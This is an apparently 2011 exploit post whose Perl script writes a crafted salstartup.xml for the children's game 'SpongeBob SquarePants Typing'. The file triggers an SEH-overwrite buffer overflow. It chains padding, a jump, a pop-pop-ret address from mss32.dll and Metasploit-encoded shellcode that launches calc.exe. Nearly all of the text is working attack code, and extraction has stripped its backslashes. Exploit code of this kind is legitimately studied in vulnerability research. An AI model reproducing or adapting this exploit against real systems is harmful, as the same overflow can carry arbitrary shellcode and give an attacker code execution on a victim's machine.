Home / exploits SpongeBob SquarePants Typing Buffer Overflow
Posted on 19 May 2011
# SEH overwrite exploit for SpongeBob SquarePants Typing # from The Learning Company (http://goo.gl/1EHaD) # Date: May 4th 2011 # Author: Infant Overflow # # .-. # ) ( # - - # |_____| # / \n# | ~~~ | # | ~~~~~ | # | ~~~~~ | # | ~~~~~ | # \_______/ # # Fresh out the womb laying the smack down on SpongeBob # I like my sploits like I like my milk... fresh # # Shoutz to Pops, Elmo, my girl Dora, Handy M, and Thomas the Mother f'n Train # # Tested on WinXP SP3 my $diaper = "A" x 1024; # Everyone needs some padding my $jumprope = "xebx06x90x90"; # jump 6 my $pacifier = pack('V',0x2110234D); # pop pop ret from mss32.dll <-- no /SAFESEH sucks like my pacifier! # windows/exec - 247 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=process, CMD=c:windowssystem32calc.exe my $shellcode = "xd9xf6xbax24xb5x20x67xd9x74x24xf4x5fx2bxc9" . "xb1x38x31x57x17x03x57x17x83xcbx49xc2x92xef" . "x5ax8ax5dx0fx9bxedxd4xeaxaax3fx82x7fx9ex8f" . "xc0x2dx13x7bx84xc5xa0x09x01xeax01xa7x77xc5" . "x92x09xb8x89x51x0bx44xd3x85xebx75x1cxd8xea" . "xb2x40x13xbex6bx0fx86x2fx1fx4dx1bx51xcfxda" . "x23x29x6ax1cxd7x83x75x4cx48x9fx3ex74xe2xc7" . "x9ex85x27x14xe2xccx4cxefx90xcfx84x21x58xfe" . "xe8xeex67xcfxe4xefxa0xf7x16x9axdax04xaax9d" . "x18x77x70x2bxbdxdfxf3x8bx65xdexd0x4axedxec" . "x9dx19xa9xf0x20xcdxc1x0cxa8xf0x05x85xeaxd6" . "x81xcexa9x77x93xaax1cx87xc3x12xc0x2dx8fxb0" . "x15x57xd2xdexe8xd5x68xa7xebxe5x72x87x83xd4" . "xf9x48xd3xe8x2bx2dx2bxa3x76x07xa4x6axe3x1a" . "xa9x8cxd9x58xd4x0exe8x20x23x0ex99x25x6fx88" . "x71x57xe0x7dx76xc4x01x54x15xd0xa1x20xb3x4a" . "x3exa0x34xe1xe2x4dxc2x76x6fxd7x59x4bxbdx4b" . "xc1xcaxadx10x2bx69x56xb2x33"; my $rattle ='<?xml version="1.0" standalone="yes"?> <startup> <userPath>"'; my $playpen = '"</userPath> <cdName>"SpongeBob SquarePants Typing"</cdName> <cdAge>7-10</cdAge> <music>1000</music> <pdfInstaller>"E:INSTALLACROBATVer50Acrobat Reader 5 Installer.exe"</pdfInstaller> <signin> <execute>yes</execute> <style>tlc</style> <age>4To6</age> <rscFile>default</rscFile> </signin> <disk1> <filename>E:TLC383167-CD</filename> <cdName>"SpongeBob SquarePants Typing"</cdName> </disk1> <screenRSC>salstartup.rsc</screenRSC> <screen> <element> <condition>all</condition> <type>scene</type> <id>9100</id> </element> <element> <condition>all</condition> <type>toon</type> <x>0</x> <y>0</y> <id>9100</id> <startFrame>1</startFrame> </element> <mainPlayButton> <condition>all</condition> <type>fob</type> <class>play</class> <cdCheck>disk1</cdCheck> <target>"C:Program FilesThe Learning CompanySpongeBob SquarePants TypingSPT.exe"</target> <postLaunch>wait</postLaunch> <x>461</x> <y>60</y> <id>9124</id> </mainPlayButton> <helpButton> <condition>all</condition> <type>fob</type> <class>extension</class> <cdCheck></cdCheck> <target>"C:Program FilesThe Learning CompanySpongeBob SquarePants TypingUser's Guide.pdf"</target> <parameters></parameters> <postLaunch>wait</postLaunch> <x>543</x> <y>158</y> <id>9126</id> </helpButton> <uninstallButton> <condition>all</condition> <type>fob</type> <class>uninstall</class> <target>C:WINDOWSTLCUninstall.exe</target> <parameters>-l</parameters> <crc>"C:Program FilesThe Learning CompanySpongeBob SquarePants TypingUninstall.xml"</crc> <postLaunch>exit</postLaunch> <x>514</x> <y>373</y> <id>9125</id> </uninstallButton> <onlineButton> <condition>all</condition> <type>fob</type> <class>link</class> <cdCheck></cdCheck> <target>http://redirect.expressit.com/redirect.asp?resku=383167&action_id=Launcher</target> <parameters></parameters> <postLaunch>wait</postLaunch> <x>538</x> <y>263</y> <yy>375</yy> <id>9130</id> </onlineButton> <EregButton> <condition>all</condition> <type>fob</type> <class>install</class> <cdCheck></cdCheck> <target>"C:Program FilesThe Learning CompanySpongeBob SquarePants Typingeregereg32.exe"</target> <parameters></parameters> <postLaunch>wait</postLaunch> <x>522</x> <y>324</y> <id>9129</id> </EregButton> <SellScreen> <condition>all</condition> <type>fob</type> <class>link</class> <cdCheck>disk1</cdCheck> <target>startup:startup/BrandingPage</target> <parameters></parameters> <postLaunch>wait</postLaunch> <x>543</x> <y>207</y> <id>9128</id> </SellScreen> </screen> <BrandingPage> <element> <condition>all</condition> <type>toon</type> <id>5000</id> </element> <screenSaverButton> <condition>all</condition> <type>fob</type> <class>install</class> <cdCheck>disk1</cdCheck> <target>E:SailorificStuffsbscreen_setup.exe</target> <parameters></parameters> <postLaunch>wait</postLaunch> <x>546</x> <y>188</y> <id>5054</id> </screenSaverButton> <backButton> <condition>all</condition> <type>fob</type> <class>link</class> <target>startup:startup/screen</target> <x>537</x> <y>263</y> <id>5055</id> </backButton> </BrandingPage> <sysReq> <execute>yes</execute> <pc> <processor> <family>pentium</family> <speed>266</speed> <msgType>warn</msgType> <msgText>"266 MHz Pentium or faster is recommended."</msgText> </processor> <os> <Win95>no</Win95> <Win98>yes</Win98> <WinMe>yes</WinMe> <WinNT4>no</WinNT4> <Win2000>yes</Win2000> <WinXP>yes</WinXP> <msgType>warn</msgType> <msgText>"You operating system is not supported. Play at your own risk!"</msgText> </os> <diskSpace> <mbAvailable>100</mbAvailable> <msgType>ignore</msgType> <msgText>"There is not enough hard disk space available to play!"</msgText> </diskSpace> <physicalRAM> <mbAvailable>64</mbAvailable> <msgType>warn</msgType> <msgText>"There is not enough RAM available to play!"</msgText> </physicalRAM> <availableRAM> <mbAvailable>64</mbAvailable> <msgType>warn</msgType> <msgText>You are low on memory!</msgText> </availableRAM> <display> <width>800</width> <height>600</height> <bits>16</bits> <msgType>fail</msgType> <msgText>"Your display is not capable of 800 x 600 16-bit, thousands of colors."</msgText> </display> <sound> <msgType>fail</msgType> <msgText>"WAVE driver is not available."</msgText> </sound> </pc> <mac> <processor> <family>ppc</family> <speed>233</speed> <msgType>warn</msgType> <msgText>"233 MHz Powerpc or faster is recommended."</msgText> </processor> <os> <minVersion>0860</minVersion> <msgType>fail</msgType> <msgText>"You must run System 8.6 or above!"</msgText> </os> <osX> <minVersion>1004</minVersion> <msgType>fail</msgType> <msgText>"You must run OSX 10.04 or above!"</msgText> </osX> <diskSpace> <mbAvailable>100</mbAvailable> <msgType>ignore</msgType> <msgText>"There is not enough hard disk space available to play!"</msgText> </diskSpace> <physicalRAM> <mbAvailable>64</mbAvailable> <msgType>warn</msgType> <msgText>"There is not enough RAM available to play!"</msgText> </physicalRAM> <availableRAM> <mbAvailable>0</mbAvailable> <msgType>warn</msgType> <msgText></msgText> </availableRAM> <colorDepth> <minBits>16</minBits> <msgType>warn</msgType> <msgText>"Your display is not capable of 16-bit, thousands of colors."</msgText> </colorDepth> <sound> <available>ignore</available> <msgType>ignore</msgType> <msgText></msgText> </sound> </mac> </sysReq> </startup>'; my $slide = "x90" x 1000; open(myfile,'>salstartup.xml'); print myfile $rattle.$diaper.$jumprope.$pacifier.$shellcode.$slide.$playpen;
